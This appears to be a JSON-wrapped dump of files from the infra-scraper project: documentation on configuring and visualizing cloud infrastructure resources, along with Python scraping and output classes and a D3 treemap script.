example.\n\n.. code-block:: yaml\n\n sum(irate(haproxy_http_response_5xx{\n proxy=~\"glance.*\",\n sv=\"FRONTEND\"\n }[5m]))\n\nOr you can have the query with the same result to the InfluxDB server:\n\n.. code-block:: yaml\n\n SELECT sum(\"count\")\n FROM \"openstack_glance_http_response_times\"\n WHERE \"hostname\" =~ /$server/\n AND \"http_status\" = '5xx'\n AND $timeFilter\n GROUP BY time($interval)\n fill(0)\n\nHaving these metrics you can assign numerical properties of your relational\nnodes with these values and use them in correct context.\n\n\nEvents Corellations\n~~~~~~~~~~~~~~~~~~~\n\nAs you can query the time-series databases, you are able to query also the\nElasticSearch for events.\n\n.. code-block:: yaml\n\n \"searchSourceJSON\": {\n \"index\": \"log-*\",\n \"query\": {\n \"query_string\": {\n \"query\": \"*\",\n \"analyze_wildcard\": true\n }\n },\n \"filter\": []\n }\n\nThe events are transformed to numerical representation and create again\nnumerical properies of both nodes and vertices.\n\n\nAlarms Corellations\n~~~~~~~~~~~~~~~~~~~\n\nYou can corellate the output of the alarm evaluators to dynamically set the\nstatus of resources. You can use the functional status of checks from\nPrometheus Alarmmanager, Nagios or Sensu.\n\n\nVisualization Layouts\n=====================\n\nDifferent data require different diagram visualization. Diagrams are symbolic\nrepresentation of information according to some visualization technique. Every\ntime you need to emphasise different qualities of displayed resources you can\nchoose from several layouts to display the data.\n\n\nNetwork Graph Layouts\n---------------------\n\nFor most of the cases we will be dealing with network data that do not have\nany single root or beginning.\n\n\nForce-Directed Graph\n~~~~~~~~~~~~~~~~~~~~\n\n`Force-directed graph` drawing algorithms are used for drawing graphs in an\naesthetically pleasing way. Their purpose is to position the nodes of a graph\nin two-dimensional or three-dimensional space so that all the edges are of\nmore or less equal length and there are as few crossing edges as possible, by\nassigning forces among the set of edges and the set of nodes, based on their\nrelative positions, and then using these forces either to simulate the motion\nof the edges and nodes or to minimize their energy.\n\n.. figure:: ./doc/source/static/img/force-directed-plot.png\n :width: 600px\n :figclass: align-center\n\n Force-directed plot of all OpenStack resources (cca 3000 resources)\n\n\nHive Plot\n~~~~~~~~~\n\nThe `hive plot` is a visualization method for drawing networks. Nodes\nare mapped to and positioned on radially distributed linear axes — this\nmapping is based on network structural properties. Edges are drawn as curved\nlinks. Simple and interpretable.\n\n.. figure:: ./doc/source/static/img/hive-plot.png\n :width: 600px\n :figclass: align-center\n\n Hive plot of all OpenStack resources (cca 3000 resources)\n\n\nArc Diagram\n~~~~~~~~~~~\n\nAn `arc diagram` is a style of graph drawing, in which the vertices of a graph\nare placed along a line in the Euclidean plane, with edges being drawn as\nsemicircles in one of the two halfplanes bounded by the line, or as smooth\ncurves formed by sequences of semicircles. In some cases, line segments of the\nline itself are also allowed as edges, as long as they connect only vertices\nthat are consecutive along the line.\n\n.. figure:: ./doc/source/static/img/arc-diagram.png\n :width: 600px\n :figclass: align-center\n\n Arc diagram of OpenStack project's resources (cca 100 resources)\n\n\nAdjacency Matrix\n~~~~~~~~~~~~~~~~\n\nAn adjacency matrix is a square matrix used to represent a finite graph. The\nelements of the matrix indicate whether pairs of vertices are adjacent or not\nin the graph.\n\n.. figure:: ./doc/source/static/img/adjacency-matrix.png\n :width: 600px\n :figclass: align-center\n\n Adjacency matrix of OpenStack project's resources (cca 100 resources)\n\n\nHierarchical Edge Bundling\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nDanny Holten presents an awesome and aesthetically pleasing way of simplifying\ngraphs and making tree graphs more accessible. What makes his project so\nuseful, however, is how he outlines the particular thought process that goes\ninto making a visualization.\n\n.. figure:: ./doc/source/static/img/hiearchical-edge-bundling.png\n :width: 600px\n :figclass: align-center\n\n Hierarchical edge bundling of SaltStack services (cca 100 resources)\n\n\nTree Graph Layouts\n------------------\n\nDirected graph traversal can give os acyclic structures suitable for showing\nparent-child relations in your subraphs.\n\n\nInstallation\n============\n\nRelease version of infra-scraper is currently available on `Pypi\n<https://pypi.org/project/infra-scraper/>`_, to install it, simply execute:\n\n.. code-block:: bash\n\n pip install infra-scraper\n\nTo bootstrap latest development version into virtualenv, run following\ncommands:\n\n.. code-block:: bash\n\n git clone [email protected]:cznewt/infra-scraper.git\n cd infra-scraper\n virtualenv venv\n source venv/bin/activate\n python setup.py install\n\n\nConfiguration\n=============\n\nYou provide one configuration file for all providers. The default location is\n``/etc/infra-scraper/config.yaml`` but it can be overriden by\n``INFRA_SCRAPER_CONFIG_PATH`` environmental variable, for example:\n\n.. code-block:: bash\n\n export INFRA_SCRAPER_CONFIG_PATH=~/scraper.yml\n\n\nETCD hosted configuration\n-------------------------\n\nYou can use ETCD as a storage backend for the configuration and scrape\nresults. Following environmental parameters need to be set:\n\n.. code-block:: bash\n\n export INFRA_SCRAPER_CONFIG_BACKEND=etcd\n export INFRA_SCRAPER_CONFIG_PATH=/service/scraper/config\n\n\nStorage configuration\n---------------------\n\nThe preffered scraping storage backend is neo4j service accessed by bolt\ninterface.\n\n.. code-block:: yaml\n\n storage:\n backend: neo4j\n database_url: 'bolt://neo4j:[email protected]:7687'\n endpoints: {}\n\n\nYou can set you local filesystem path where scraped data will be saved.\n\n.. code-block:: yaml\n\n storage:\n backend: localfs\n storage_dir: /tmp/scraper\n endpoints: {}\n\nYou can also set the scraping storage backend to use the ETCD service.\n\n.. code-block:: yaml\n\n storage:\n backend: etcd\n storage_path: /scraper/data\n endpoints: {}\n\n\nEndpoints configuration\n-----------------------\n\nEach endpoint kind expects a little different set of configuration. Following\nsamples show the required parameters to setup individual endpoints.\n\n\nAmazon Web Services\n~~~~~~~~~~~~~~~~~~~\n\nAWS scraping uses ``boto3`` high level AWS python SDK for accessing and\nmanipulating AWS resources.\n\n\n.. code-block:: yaml\n\n endpoints:\n aws-admin:\n kind: aws\n config:\n region: us-west-2\n aws_access_key_id: <access_key_id>\n aws_secret_access_key: <secret_access_key>\n\n\nKubernetes\n~~~~~~~~~~\n\nKubernetes requires some information from kubeconfig file. You provide the\nparameters of the cluster and the user to the scraper. These can be found\nunder corresponding keys.\n\n.. code-block:: yaml\n\n endpoints:\n k8s-admin:\n kind: kubernetes\n layouts:\n - force\n - hive\n config:\n cluster:\n server: https://kubernetes-api:443\n certificate-authority-data: |\n <ca-for-server-and-clients>\n user:\n client-certificate-data: |\n <client-cert-public>\n client-key-data: |\n <client-cert-private>\n\n.. note::\n\n Options ``config.cluster`` and ``config.user`` can be found in your\n ``kubeconfig`` file. Just copy the config fragment with cluster parameters\n and fragment with user parameter.\n\n\nOpenStack\n~~~~~~~~~\n\nConfigurations for keystone v2 and keystone v3 clouds. Config for single\ntenant scraping.\n\n.. code-block:: yaml\n\n endpoints:\n os-v2-tenant:\n kind: openstack\n description: OpenStack (keystone v2) tenant\n scope: local\n layouts:\n - arc\n - force\n - hive\n - matrix\n config:\n region_name: RegionOne\n compute_api_version: '2.1'\n auth:\n username: user\n password: password\n project_name: project-name\n domain_name: 'default'\n auth_url: 'https://keystone-api:5000/v3'\n\nConfig for scraping resources from entire cloud.\n\n.. code-block:: yaml\n\n endpoints:\n os-v2-admin:\n kind: openstack\n description: OpenStack (keystone v2) cloud\n scope: global\n layouts:\n - force\n - hive\n config:\n region_name: RegionOne\n auth:\n username: admin\n password: password\n project_name: admin\n auth_url: https://keystone-api:5000/v2.0\n\n\nSaltStack\n~~~~~~~~~\n\nConfiguration for connecting to Salt API.\n\n.. code-block:: yaml\n\n endpoints:\n salt-global:\n kind: salt\n layouts:\n - force\n - hive\n config:\n auth_url: 'http://127.0.0.1:8000'\n username: salt-user\n password: password\n\n\nTerraform\n~~~~~~~~~\n\nConfiguration for parsing terraform templates.\n\n.. code-block:: yaml\n\n endpoints:\n tf-aws-app:\n kind: terraform\n layouts:\n - hive\n config:\n dir: ~/terraform/two-tier-aws\n\nUsage\n=====\n\nThe application comes with several entry commands:\n\n\nScraping commands\n-----------------\n\n**scraper_get <endpoint-name>**\n\n Scrape single endpoint once.\n\n**scraper_get_forever <endpoint-name>**\n\n Scrape single endpoint continuously.\n\n**scraper_get_all**\n\n Scrape all defined endpoints once.\n\n**scraper_get_all_forever**\n\n Scrape all defined endpoints continuously.\n\n\nUI and utility commands\n-----------------------\n\n**scraper_status**\n\n Display the service status, endpoints, scrapes, etc.\n\n**scraper_web**\n\n Start the UI with visualization samples and API that provides the scraped\n data.\n\nExample Platform Metadata\n=========================\n\nFollowing outputs show available resources and relations from given domain.\n\n\nKubernetes\n----------\n\n.. code-block:: yaml\n\n kind: kubernetes\n name: test-kubernetes\n relations:\n k8s:deployment-k8s:namespace: 22\n k8s:deployment-k8s:replica_set: 62\n k8s:endpoint-k8s:namespace: 28\n k8s:event-k8s:namespace: 52\n k8s:persistent_volume_claim-k8s:namespace: 1\n k8s:pod-k8s:namespace: 52\n k8s:pod-k8s:node: 52\n k8s:pod-k8s:service: 52\n k8s:replica_set-k8s:namespace: 62\n k8s:replica_set-k8s:pod: 51\n k8s:replication_controller-k8s:namespace: 1\n k8s:secret-k8s:namespace: 1\n k8s:service-k8s:namespace: 30\n k8s:service_account-k8s:namespace: 1\n resources:\n k8s:deployment: 22\n k8s:endpoint: 28\n k8s:event: 52\n k8s:namespace: 4\n k8s:node: 5\n k8s:persistent_volume: 1\n k8s:persistent_volume_claim: 1\n k8s:pod: 52\n k8s:replica_set: 62\n k8s:replication_controller: 1\n k8s:secret: 1\n k8s:service: 30\n k8s:service_account: 1\n timestamp: 1508692477\n\n\nOpenStack\n---------\n\n.. code-block:: yaml\n\n kind: openstack\n name: test-openstack\n relations:\n os:floating_ip-os:project: 617\n os:hypervisor-os:aggregate: 46\n os:network-os:project: 575\n os:port-os:hypervisor: 3183\n os:port-os:network: 3183\n os:port-os:project: 3183\n os:port-os:server: 3183\n os:router-os:project: 42\n os:server-os:flavor: 676\n os:server-os:hypervisor: 676\n os:server-os:project: 676\n os:stack-os:network: 7\n os:stack-os:port: 17\n os:stack-os:project: 2\n os:stack-os:server: 7\n os:stack-os:subnet: 7\n os:subnet-os:network: 567\n os:subnet-os:project: 567\n resources:\n os:aggregate: 13\n os:flavor: 43\n os:floating_ip: 617\n os:hypervisor: 72\n os:network: 575\n os:port: 3183\n os:resource_type: 169\n os:router: 42\n os:server: 676\n os:stack: 2\n os:subnet: 567\n os:volume: 10\n timestamp: 1508694475\n\n\nSaltStack\n---------\n\n.. code-block:: yaml\n\n kind: salt\n name: test-salt\n relations:\n salt_job-salt_high_state: 552\n salt_job-salt_minion: 9\n salt_minion-salt_high_state: 689\n salt_service-salt_high_state: 689\n salt_service-salt_minion: 24\n salt_user-salt_job: 7\n resources:\n salt_high_state: 689\n salt_job: 7\n salt_minion: 3\n salt_service: 24\n salt_user: 2\n timestamp: 1508932328\n" }, { "alpha_fraction": 0.6084977388381958, "alphanum_fraction": 0.6084977388381958, "avg_line_length": 24.30769157409668, "blob_id": "fceadafcb4c032248220dcbad47daddecfe5bc1c", "content_id": "b65fc65bb7bb0fb12548025bc01d4394e1bde6a5", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 659, "license_type": "permissive", "max_line_length": 62, "num_lines": 26, "path": "/infra_scraper/output/base.py", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\nimport yaml\nimport json\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass BaseOutput(object):\n\n def __init__(self, **kwargs):\n pass\n\n def get_data(self, data_format='raw', raw_data={}):\n data = raw_data.copy()\n if data_format == 'yaml':\n return self.yaml_output(self.transform_data(data))\n elif data_format == 'json':\n return self.json_output(self.transform_data(data))\n else:\n return self.transform_data(data)\n\n def yaml_output(self, data):\n return yaml.safe_dump(data, default_flow_style=False)\n\n def json_output(self, data):\n return json.dumps(data)\n" }, { "alpha_fraction": 0.6435045599937439, "alphanum_fraction": 0.6435045599937439, "avg_line_length": 29.045454025268555, "blob_id": "608c868ac40d0dd112af960aeb5ad355a1a4490e", "content_id": "e785a5d3f8527bc4a6b624e18ebe5ac075feca92", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 662, "license_type": "permissive", "max_line_length": 69, "num_lines": 22, "path": "/infra_scraper/constructors.py", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\nimport json\nimport os\nimport threading\n\n_json_path = os.path.join(\n os.path.dirname(os.path.realpath(__file__)), 'constructors.json')\n_class_mapping = None\n_class_mapping_lock = threading.Lock()\n\n\ndef get_constructor_mapping():\n global _class_mapping\n if _class_mapping is not None:\n return _class_mapping.copy()\n with _class_mapping_lock:\n if _class_mapping is not None:\n return _class_mapping.copy()\n tmp_class_mapping = {}\n with open(_json_path, 'r') as json_file:\n tmp_class_mapping.update(json.load(json_file))\n _class_mapping = tmp_class_mapping\n return tmp_class_mapping.copy()\n" }, { "alpha_fraction": 0.6602451801300049, "alphanum_fraction": 0.6602451801300049, "avg_line_length": 18.65517234802246, "blob_id": "582c587c9030b034f12cfe8338dd1e2672b0b09a", "content_id": "02a121457ed752bb7c5d31ed862800157d8111e4", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 571, "license_type": "permissive", "max_line_length": 75, "num_lines": 29, "path": "/doc/source/text/app-install.rst", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\n============\nInstallation\n============\n\n\nPIP Installation\n================\n\nRelease version of infra-scraper is currently available on `Pypi\n<https://pypi.org/project/infra-scraper/>`_, to install it, simply execute:\n\n.. code-block:: bash\n\n pip install infra-scraper\n\n\nInstalation from Source\n=======================\n\nTo bootstrap latest development version into virtualenv, run following\ncommands:\n\n.. code-block:: bash\n\n git clone [email protected]:cznewt/infra-scraper.git\n cd infra-scraper\n virtualenv venv\n source venv/bin/activate\n python setup.py install\n" }, { "alpha_fraction": 0.6231343150138855, "alphanum_fraction": 0.6231343150138855, "avg_line_length": 27.678571701049805, "blob_id": "fb883e387873df2a8f97a9d9ea0719a9815aeb6b", "content_id": "05892df9f0405283bb85fbf66ef5eaa5b0fb257f", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 804, "license_type": "permissive", "max_line_length": 94, "num_lines": 28, "path": "/infra_scraper/output/count.py", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\nfrom datetime import datetime\n\nimport logging\nfrom .base import BaseOutput\n\nlogger = logging.getLogger(__name__)\n\n\nclass CountOutput(BaseOutput):\n\n def __init__(self, **kwargs):\n super(CountOutput, self).__init__(**kwargs)\n\n def transform_data(self, data):\n resources = {}\n relations = {}\n\n for resource_name, resource_data in data['resources'].items():\n resources[resource_name] = len(resource_data)\n\n for relation_name, relation_data in data['relations'].items():\n relations[relation_name] = len(relation_data)\n\n data['resources'] = resources\n data['relations'] = relations\n data.pop('resource_types')\n data['date'] = datetime.fromtimestamp(data['timestamp']).strftime('%Y-%m-%dT%H:%M:%S')\n return data\n" }, { "alpha_fraction": 0.419345498085022, "alphanum_fraction": 0.4205039143562317, "avg_line_length": 41.10975646972656, "blob_id": "ffc4d9d9fa1a77464b386ded277578c14df5eff0", "content_id": "8f46b494d3c3ce014c0eaf04aa74441f30a34862", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3453, "license_type": "permissive", "max_line_length": 84, "num_lines": 82, "path": "/infra_scraper/input/reclass.py", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom infra_scraper.input.saltstack import SaltStackInput\nfrom infra_scraper.utils import setup_logger\n\nlogger = setup_logger('input.reclass')\n\n\nclass SaltReclassInput(SaltStackInput):\n\n def __init__(self, **kwargs):\n super(SaltReclassInput, self).__init__(**kwargs)\n self.kind = 'salt'\n\n def _create_relations(self):\n for resource_id, resource in self.resources.get('salt_job', {}).items():\n for minion_id, result in resource['metadata'].get('Result', {}).items():\n self._scrape_relation(\n 'on_salt_minion',\n resource_id,\n minion_id)\n\n def scrape_all_resources(self):\n self.scrape_minions()\n self.scrape_resources()\n self.scrape_jobs()\n# self.scrape_services()\n\n def scrape_resources(self):\n response = self.api.low([{\n 'client': 'local',\n 'expr_form': 'compound',\n 'tgt': 'I@salt:master',\n 'fun': 'reclass.graph_data'\n }]).get('return')[0]\n for minion_id, minion in response.items():\n for service in minion['graph']:\n service_id = '{}|{}'.format(service['host'],\n service['service'])\n self._scrape_resource(service_id,\n service['service'],\n 'salt_service', None,\n metadata=service)\n self._scrape_relation(\n 'on_salt_minion',\n service_id,\n service['host'])\n for rel in service['relations']:\n if rel['host'] not in self.resources['salt_minion']:\n self._scrape_resource(rel['host'],\n rel['host'],\n 'salt_minion', None,\n metadata={})\n rel_service_id = '{}|{}'.format(rel['host'],\n rel['service'])\n if rel_service_id not in self.resources['salt_service']:\n self._scrape_resource(rel_service_id,\n rel['service'],\n 'salt_service', None,\n metadata={})\n self._scrape_relation(\n 'on_salt_minion',\n rel_service_id,\n rel['host'])\n self._scrape_relation(\n 'requires_salt_service',\n service_id,\n rel_service_id)\n\n def scrape_jobs(self):\n response = self.api.low([{\n 'client': 'runner',\n 'fun': 'jobs.list_jobs',\n 'arg': \"search_function='[\\\"state.apply\\\", \\\"state.sls\\\"]'\"\n }]).get('return')[0]\n for job_id, job in response.items():\n if job['Function'] in ['state.apply', 'state.sls']:\n result = self.api.lookup_jid(job_id).get('return')[0]\n job['Result'] = result\n self._scrape_resource(job_id,\n job['Function'],\n 'salt_job', None, metadata=job)\n" }, { "alpha_fraction": 0.4711343050003052, "alphanum_fraction": 0.4792573153972626, "avg_line_length": 35.294734954833984, "blob_id": "29b23558d6770ce9f3af1d6905989deb9f72bf20", "content_id": "0e375659e2d07e54ba2cd0ca01f0343166a8e775", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 3447, "license_type": "permissive", "max_line_length": 123, "num_lines": 95, "path": "/infra_scraper/assets/static/js/d3.plot.treemap.js", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "var RelationalPlot = function(RelationalPlot){\n /**\n * Tree map rendering method\n * @param dataUrl - Data endpoint URL\n * @param graphSelector - Graph parent <div> CSS selector\n * @param refreshInterval - Refresh interval in seconds (null for disabled)\n */\n RelationalPlot.treeMap = function(dataUrl, graphSelector, refreshInterval){\n\n var width = $(graphSelector).innerWidth(),\n height = width * 2/3;\n\n var format = d3.format(\",d\");\n\n var color = d3.scaleOrdinal()\n .range(d3.schemeCategory10\n .map(function(c) { c = d3.rgb(c); c.opacity = 0.6; return c; }));\n\n var stratify = d3.stratify()\n .parentId(function(d) { return d.id.substring(0, d.id.lastIndexOf(\".\")); });\n\n var graph = this;\n this._data = {};\n\n this.init = function(alreadyRunning){\n if(alreadyRunning && graph.treemap){\n graph.treemap.remove();\n }\n\n graph.treemap = d3.treemap()\n .size([width, height])\n .padding(1)\n .round(true);\n\n if(!alreadyRunning){\n graph.requestData(dataUrl, graph.render);\n $(window).on('resize', function(ev){\n graph.resetPosition();\n graph.init(true);\n graph.render();\n });\n\n if(refreshInterval){\n setInterval(function(){\n graph.requestData(dataUrl, function(){\n graph.init(true);\n graph.render();\n });\n }, refreshInterval * 1000);\n }\n }\n };\n this.render = function(){\n\n var root = stratify(graph._data)\n .sum(function(d) { return d.value; })\n .sort(function(a, b) { return b.height - a.height || b.value - a.value; });\n\n graph.treemap(root);\n\n d3.select(selector)\n .selectAll(\".node\")\n .data(root.leaves())\n .enter().append(\"div\")\n .attr(\"class\", \"node\")\n .attr(\"title\", function(d) { return d.id + \"\\n\" + format(d.value); })\n .style(\"left\", function(d) { return d.x0 + \"px\"; })\n .style(\"top\", function(d) { return d.y0 + \"px\"; })\n .style(\"width\", function(d) { return d.x1 - d.x0 + \"px\"; })\n .style(\"height\", function(d) { return d.y1 - d.y0 + \"px\"; })\n .style(\"background\", function(d) { while (d.depth > 1) d = d.parent; return color(d.id); })\n .append(\"div\")\n .attr(\"class\", \"node-label\")\n .text(function(d) { return d.id.substring(d.id.lastIndexOf(\".\") + 1).split(/(?=[A-Z][^A-Z])/g).join(\"\\n\"); })\n .append(\"div\")\n .attr(\"class\", \"node-value\")\n .text(function(d) { return format(d.value); });\n\n };\n this.requestData = function(dataUrl, callback){\n d3.json(dataUrl, function(res){\n if(res && res.result === 'ok'){\n graph._data = res.data;\n console.log(graph._data)\n if(typeof callback === 'function'){\n callback();\n }\n }else{\n console.log(\"Cannot create topology graph, server returns error: \" + res.data);\n }\n });\n };\n };\n return RelationalPlot;\n}(RelationalPlot || {});" }, { "alpha_fraction": 0.5194973349571228, "alphanum_fraction": 0.5235630869865417, "avg_line_length": 35.554054260253906, "blob_id": "45ac1cc5b306c0ccea8617e77104a911876b4758", "content_id": "1807414ba3fd6967b6b27a238502e395839b664c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5411, "license_type": "permissive", "max_line_length": 94, "num_lines": 148, "path": "/infra_scraper/output/vis.py", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\nimport logging\nfrom .base import BaseOutput\nfrom datetime import datetime\nfrom infra_scraper.utils import get_node_icon\n\nlogger = logging.getLogger(__name__)\n\n\nclass VisOutput(BaseOutput):\n\n def __init__(self, **kwargs):\n super(VisOutput, self).__init__(**kwargs)\n\n def _transform_openstack(self, data):\n resources = {}\n relations = []\n axes = {}\n i = 0\n kinds = 0\n for resource_name, resource_data in data['resources'].items():\n if resource_name != 'os_port':\n kinds += 1\n\n for resource_name, resource_data in data['resources'].items():\n if resource_name != 'os_port':\n for resource_id, resource_item in resource_data.items():\n resource_item.pop('metadata')\n resources[resource_id] = resource_item\n icon = get_node_icon(data['resource_types'][resource_name]['icon'])\n axes[resource_name] = {\n 'x': i,\n 'angle': 360 / kinds * i,\n 'innerRadius': 0.2,\n 'outerRadius': 1.0,\n 'name': data['resource_types'][resource_name]['name'],\n 'items': len(data['resources'][resource_name]),\n 'kind': resource_name,\n 'icon': icon,\n }\n i += 1\n\n for relation_name, relation_data in data['relations'].items():\n for relation in relation_data:\n if relation['source'] in resources and relation['target'] in resources:\n relations.append(relation)\n\n data['resources'] = resources\n data['relations'] = relations\n data['axes'] = axes\n return data\n\n def _transform_default(self, data):\n resources = {}\n relations = []\n axes = {}\n i = 0\n kinds = len(data['resources'])\n for resource_name, resource_data in data['resources'].items():\n for resource_id, resource_item in resource_data.items():\n resource_item.pop('metadata')\n resources[resource_id] = resource_item\n icon = get_node_icon(data['resource_types'][resource_name]['icon'])\n axes[resource_name] = {\n 'x': i,\n 'angle': 360 / kinds * i,\n 'innerRadius': 0.2,\n 'outerRadius': 1.0,\n 'name': data['resource_types'][resource_name]['name'],\n 'items': len(data['resources'][resource_name]),\n 'kind': resource_name,\n 'icon': icon,\n }\n i += 1\n\n for relation_name, relation_data in data['relations'].items():\n for relation in relation_data:\n if relation['source'] in resources and relation['target'] in resources:\n relations.append(relation)\n\n data['resources'] = resources\n data['relations'] = relations\n data['axes'] = axes\n return data\n\n def transform_data(self, data):\n data['date'] = datetime.fromtimestamp(data['timestamp']).strftime('%Y-%m-%dT%H:%M:%S')\n if data['kind'] == 'openstack':\n return self._transform_openstack(data)\n else:\n return self._transform_default(data)\n\n\nclass VisHierOutput(BaseOutput):\n\n def __init__(self, **kwargs):\n super(VisHierOutput, self).__init__(**kwargs)\n\n def _transform_openstack(self, data):\n resources = {}\n out_resources = []\n\n for resource_name, resource_data in resources.items():\n out_resources.append({\n 'name': resource_name,\n 'size': 1,\n 'relations': resource_data['relations']\n })\n data['resources'] = out_resources\n data.pop('relations')\n data.pop('resource_types')\n return data\n\n def _transform_default(self, data):\n resources = {}\n out_resources = []\n\n for resource_name, resource_data in data['resources'].items():\n if resource_name == 'salt_service':\n for resource_id, resource_item in resource_data.items():\n resource_item['relations'] = []\n resources['root|{}'.format(resource_id)] = resource_item\n\n for relation_name, relation_data in data['relations'].items():\n if relation_name == 'salt_service-salt_service':\n\n for relation in relation_data:\n relation['source'] = 'root|{}'.format(relation['source'])\n relation['target'] = 'root|{}'.format(relation['target'])\n resources[relation['source']]['relations'].append(\n relation['target'])\n\n for resource_name, resource_data in resources.items():\n out_resources.append({\n 'name': resource_name,\n 'size': 1,\n 'relations': resource_data['relations']\n })\n data['resources'] = out_resources\n data.pop('relations')\n data.pop('resource_types')\n return data\n\n def transform_data(self, data):\n data['date'] = datetime.fromtimestamp(data['timestamp']).strftime('%Y-%m-%dT%H:%M:%S')\n if data['kind'] == 'openstack':\n return self._transform_openstack(data)\n else:\n return self._transform_default(data)\n" }, { "alpha_fraction": 0.5586363673210144, "alphanum_fraction": 0.5586363673210144, "avg_line_length": 30.869565963745117, "blob_id": "1fe3156457dcb6c3ea61f26ec412827924ec67ac", "content_id": "2a21d47753c732a85af13f8c45fb3a74c5261c2e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2200, "license_type": "permissive", "max_line_length": 76, "num_lines": 69, "path": "/infra_scraper/input/base.py", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\nimport time\nfrom infra_scraper.utils import setup_logger, get_graph_schema\n\nlogger = setup_logger('input.base')\n\n\nclass BaseInput(object):\n\n def __init__(self, **kwargs):\n self.name = kwargs['name']\n self.config = kwargs['config']\n self.resources = {}\n self.resource_types = {}\n self.relations = {}\n self.timestamp = int(time.time())\n self._reverse_map = None\n self._schema = get_graph_schema(self.kind)\n\n def _create_relations(self):\n raise NotImplementedError\n\n def to_dict(self):\n self._create_relations()\n return {\n 'name': self.name,\n 'kind': self.kind,\n 'timestamp': self.timestamp,\n 'resource_types': self._get_resource_types(),\n 'resources': self.resources,\n 'relation_types': self._get_relation_types(),\n 'relations': self.relations,\n }\n\n def _get_resource_types(self):\n res_map = {}\n for resource_name, resource in self.resources.items():\n res_map[resource_name] = self._schema['resource'][resource_name]\n return res_map\n\n def _get_relation_types(self):\n rel_map = {}\n for relation_name, relation in self.relations.items():\n rel_map[relation_name] = self._schema['relation'][relation_name]\n return rel_map\n\n def _get_resource_mapping(self):\n if self._reverse_map is None:\n self._reverse_map = {}\n for resource_name, resource in self._schema['resource'].items():\n self._reverse_map[resource['resource']] = resource_name\n return self._reverse_map\n\n def _scrape_resource(self, uid, name, kind, link=None, metadata={}):\n if kind not in self.resources:\n self.resources[kind] = {}\n self.resources[kind][uid] = {\n 'uid': uid,\n 'kind': kind,\n 'name': name,\n 'metadata': metadata,\n }\n\n def _scrape_relation(self, kind, source, target):\n if kind not in self.relations:\n self.relations[kind] = []\n self.relations[kind].append({\n 'source': source,\n 'target': target,\n })\n" }, { "alpha_fraction": 0.7458217144012451, "alphanum_fraction": 0.7513927817344666, "avg_line_length": 41.20588302612305, "blob_id": "abeccaabd2d0d401789800e87756a91c0bcbe074", "content_id": "29708f50e6a412e9c6189647db3fe174e67f2c62", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1436, "license_type": "permissive", "max_line_length": 88, "num_lines": 34, "path": "/doc/source/text/layout-bundle.rst", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\n==========================\nHierarchical Edge Bundling\n==========================\n\nA compound graph is a frequently encountered type of data set. Relations are\ngiven between items, and a hierarchy is defined on the items as well.\nHierarchical Edge Bundling is a new method for visualizing such compound\ngraphs. Our approach is based on visually bundling the adjacency edges, i.e.,\nnon-hierarchical edges, together. We realize this as follows. We assume that\nthe hierarchy is shown via a standard tree visualization method. Next, we bend\neach adjacency edge, modeled as a B-spline curve, toward the polyline defined\nby the path via the inclusion edges from one node to another. This\nhierarchical bundling reduces visual clutter and also visualizes implicit\nadjacency edges between parent nodes that are the result of explicit adjacency\nedges between their respective child nodes. Furthermore, hierarchical edge\nbundling is a generic method which can be used in conjunction with existing\ntree visualization techniques.\n\n\nSample Visualizations\n=====================\n\n.. figure:: ../static/img/hiearchical-edge-bundling.png\n :width: 100%\n :figclass: align-center\n\n Hierarchical edge bundling of SaltStack services and their relations (cca 100 nodes)\n\n\nMore Information\n================\n\n* http://www.win.tue.nl/vis1/home/dholten/papers/bundles_infovis.pdf\n* https://www.win.tue.nl/vis1/home/dholten/papers/forcebundles_eurovis.pdf\n" }, { "alpha_fraction": 0.6963021159172058, "alphanum_fraction": 0.6963021159172058, "avg_line_length": 22.962265014648438, "blob_id": "2af1fc87e146b4c0de88f4adc79d168edc7cd6f3", "content_id": "04cee5b8262ff1678e1dc4149786355948656d5b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1271, "license_type": "permissive", "max_line_length": 130, "num_lines": 53, "path": "/doc/source/text/app-config.rst", "repo_name": "slimakcz/infra-scraper", "src_encoding": "UTF-8", "text": "\n=============\nConfiguration\n=============\n\nYou provide one configuration file for all providers. The default location is\n``/etc/infra-scraper/config.yaml`` but it can be overriden by\n``INFRA_SCRAPER_CONFIG_PATH`` environmental variable, for example:\n\n.. code-block:: bash\n\n export INFRA_SCRAPER_CONFIG_PATH=~/scraper.yml\n\n\nConfiguration in ETCD\n=====================\n\nYou can use ETCD as a storage backend for the configuration and scrape results. Following environmental parameters need to be set:\n\n.. code-block:: bash\n\n export INFRA_SCRAPER_CONFIG_BACKEND=etcd\n export INFRA_SCRAPER_CONFIG_PATH=/service/scraper/config\n\n\nStorage Configuration\n=====================\n\nYou can set you local filesystem path where scraped data will be saved.\n\n.. code-block:: yaml\n\n storage:\n backend: localfs\n path: /tmp/scraper\n endpoints: 